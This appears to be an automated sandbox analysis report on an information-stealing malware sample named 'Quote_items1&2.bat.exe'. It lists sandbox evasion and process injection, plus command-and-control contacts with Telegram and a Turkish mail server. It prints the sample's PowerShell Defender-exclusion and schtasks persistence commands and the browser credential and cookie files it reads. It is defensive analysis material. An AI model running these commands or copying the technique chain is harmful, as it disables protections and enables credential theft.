                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 7264Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe TID: 7476Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 600000
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3994364046.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3994363463.0000000000ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000134EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Memory written: C:\Users\user\Desktop\Quote_items1&2.bat.exe base: 140000000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Memory written: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe base: 140000000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Thread register set: target process: 3884
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Thread register set: target process: 7352
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Users\user\Desktop\Quote_items1&2.bat.exe C:\Users\user\Desktop\Quote_items1&2.bat.exe
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp"
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Process created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Users\user\Desktop\Quote_items1&2.bat.exe VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Users\user\Desktop\Quote_items1&2.bat.exe VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Queries volume information: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Queries volume information: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR
                Source: Yara match | File source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match | File source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR
                Source: Yara match | File source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR

                MITRE ATT&CK Matrix

                The matrix is listed here by tactic column; the number in parentheses after a technique is the count shown in the matrix cell, and techniques without a number are the unmarked cells of the matrix.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Privilege Escalation: DLL Side-Loading (1); Process Injection (211); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Defense Evasion: Disable or Modify Tools (11); Obfuscated Files or Information (3); Software Packing (2); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (41); Process Injection (211)
                Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                Discovery: File and Directory Discovery (1); System Information Discovery (13); Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); System Network Configuration Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture
                Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (4); Application Layer Protocol (25); Commonly Used Port
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1618378
                Sample: Quote_items1&2.bat.exe
                Startdate: 18/02/2025
                Architecture: WINDOWS
                Score: 100

                • DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains
                • Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                • Quote_items1&2.bat.exe (7) started
                    • Created files: C:\Users\user\AppData\...\wJFLKBSbTtvP.exe (PE32+); C:\Users\...\wJFLKBSbTtvP.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpC8F3.tmp (XML); C:\Users\user\...\Quote_items1&2.bat.exe.log (CSV)
                    • Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender
                    • Started: Quote_items1&2.bat.exe (14 2); powershell.exe (23); schtasks.exe (1)
                • wJFLKBSbTtvP.exe (5) started
                    • Signatures: Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes
                    • Started: wJFLKBSbTtvP.exe; schtasks.exe (1)
                • Quote_items1&2.bat.exe (child process)
                    • DNS/IP: bteenerji.com 78.135.65.4 (587, 64730, 64775; PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR; Turkey); api.telegram.org 149.154.167.220 (443, 49917, 64747; TELEGRAMRU; United Kingdom); 2 other IPs or domains
                • powershell.exe
                    • Signatures: Loading BitLocker PowerShell Module
                    • Started: WmiPrvSE.exe; conhost.exe
                • schtasks.exe (from Quote_items1&2.bat.exe)
